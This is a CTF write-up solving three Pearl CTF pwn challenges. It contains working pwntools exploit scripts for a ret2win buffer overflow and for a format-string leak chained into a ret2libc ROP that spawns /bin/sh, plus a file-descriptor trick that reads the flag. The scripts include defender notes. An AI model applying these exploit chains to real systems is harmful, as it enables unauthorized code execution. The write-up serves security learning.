
Pearl CTF - PWN challenges


Introduction

We solved all 3 of the 3 tasks. More information about this CTF is available here

pwn


Treasure Hunt

Solution author: kerszi

# Treasure Hunt: stack-based buffer overflow turned into a ret2win chain.
# After four fixed "mystery keys" the program reads a final key into a stack
# buffer without a length check; the overflow replaces the saved return
# address with two function addresses taken from the binary itself.
# Defender note: a bounded read (fgets with sizeof(buf)) or a stack canary
# stops this stage outright; PIE would at least force an info leak first.
from pwn import *

# The architecture has to be set explicitly when no binary is loaded from a file.
context.update(arch='x86_64', os='linux')
# Windows Terminal + WSL as the gdb terminal (author's local setup).
context.terminal = ['wt.exe','wsl.exe']

HOST="nc treasure-hunt.ctf.pearlctf.in 30008"
ADDRESS,PORT=HOST.split()[1:]  # drop the leading "nc" from the copied connect string


BINARY_NAME="./vuln"
binary = context.binary = ELF(BINARY_NAME, checksec=False)
#libc  = ELF('./libc.so.6', checksec=False)

# Pass REMOTE=1 on the command line to target the CTF service; default is a local process.
if args.REMOTE:
    p = remote(ADDRESS,PORT)
    #p = remote(ADDRESS,PORT,ssl=True)
else:
    p = process(binary.path)

# Symbol addresses are used as-is, with no base-address leak, so the binary is
# presumably not PIE (fixed load address) — confirm with checksec if reusing.
setEligibility=binary.sym.setEligibility
winTreasure=binary.sym.winTreasure

# The four keys are fixed strings the challenge expects (recovered from the binary).
p.sendlineafter(b"Enter the mystery key to proceed:", b"whisp3ring_w00ds")
p.sendlineafter(b"Enter the mystery key to proceed:", b"sc0rching_dunes")
p.sendlineafter(b"Enter the mystery key to proceed:", b"eldorian_ech0")
p.sendlineafter(b"Enter the mystery key to proceed:", b"shadow_4byss")

# 72 filler bytes reach the saved return address (buffer plus saved rbp, as
# measured by the author).  The function then "returns" into setEligibility(),
# whose own return lands in winTreasure() — hence the flag text "k33p_0n_r3turning".
payload=72*b'A'+p64(setEligibility)+p64(winTreasure)
p.sendlineafter(b"enter the final key for the win:",payload)

p.interactive()

pearl{k33p_0n_r3turning_l0l}

Readme Please


Solution author: Lazarus

nc readme-please.ctf.pearlctf.in 30039
Welcome to file reading service!
Enter the file name: /files/flag.txt
Enter password: 1234
Incorrect password!

Enter the file name: /proc/self/fd/3
pearl{f1l3_d3script0rs_4r3_c00l}

pearl{f1l3_d3script0rs_4r3_c00l}

Mr. %ROPOT%


Solution author: kerszi

# Mr. %ROPOT%: a format-string leak to defeat ASLR, followed by a ret2libc ROP
# chain through a stack buffer overflow.  The binary is patched to link against
# the challenge's own libc.so.6 so that local and remote offsets agree.
# Defender note: the root cause is user input passed to printf as the format
# string (a literal "%s" format, or building with -Wformat-security, removes the
# leak); the second stage still needs an unbounded write, which a stack canary
# or a bounded read would block.
from pwn import *
context.log_level = 'warning'  # only warn()/error() are printed; keeps the leak output readable

context.update(arch='x86_64', os='linux')
context.terminal = ['wt.exe','wsl.exe']  # Windows Terminal + WSL as the gdb terminal

HOST="nc mr---ropot.ctf.pearlctf.in 30009"
ADDRESS,PORT=HOST.split()[1:]  # drop the leading "nc" from the copied connect string

BINARY_NAME="./chall_patched"
binary = context.binary = ELF(BINARY_NAME, checksec=False)
libc  = ELF('./libc.so.6', checksec=False)

# Pass REMOTE=1 on the command line to target the CTF service; default is a local process.
if args.REMOTE:
    p = remote(ADDRESS,PORT)
else:
    p = process(binary.path)

# "%3$p" prints printf's third variadic argument as a pointer.  On x86_64 the
# first variadic arguments are register-passed, so this is presumably a stale
# register value that happens to hold a libc address; which one was found empirically.
payload=b'%3$p'
# Distance from the leaked pointer to the libc base, measured against the
# provided libc.so.6 — re-derive it if the libc build changes.
libc_offset=0xf4574+0x28000

p.sendlineafter(b"3. Exit", b"2")  # menu option 2: leave a response
p.sendlineafter(b'Did you like the fact? Leave a response:',payload)

p.recvuntil(b"Your Response:\n")

# The program echoes the formatted response, i.e. the leaked pointer as "0x...".
recv = int(p.recvline().strip(),16)

# Rebasing the libc ELF makes every symbol/gadget lookup below absolute.
libc.address=recv-libc_offset
warn(f"recv: {recv:#x}")
warn(f"libc: {libc.address:#x}")

str_bin_sh=next(libc.search(b"/bin/sh"))  # first "/bin/sh" string inside libc
system=libc.sym.system

# Gadgets come from libc (binary too small / protected to be useful on its own).
rop=ROP(libc)
ret=rop.find_gadget(['ret'])[0]
pop_rdi=rop.find_gadget(['pop rdi', 'ret'])[0]

# 57 filler bytes reach the saved return address (measured by the author).
# The leading `ret` re-aligns rsp to 16 bytes before system() is entered —
# glibc's system() faults on SSE moves with a misaligned stack otherwise.
# Chain: ret -> pop rdi; ret (rdi = "/bin/sh") -> system.
length=57
payload=length*b'A'+p64(ret)+p64(pop_rdi)+p64(str_bin_sh)+p64(system)
p.sendlineafter(b'has been recorded.',payload)

p.interactive()

pearl{fin4lly_g0t_my_fl4g_th4nks_printf}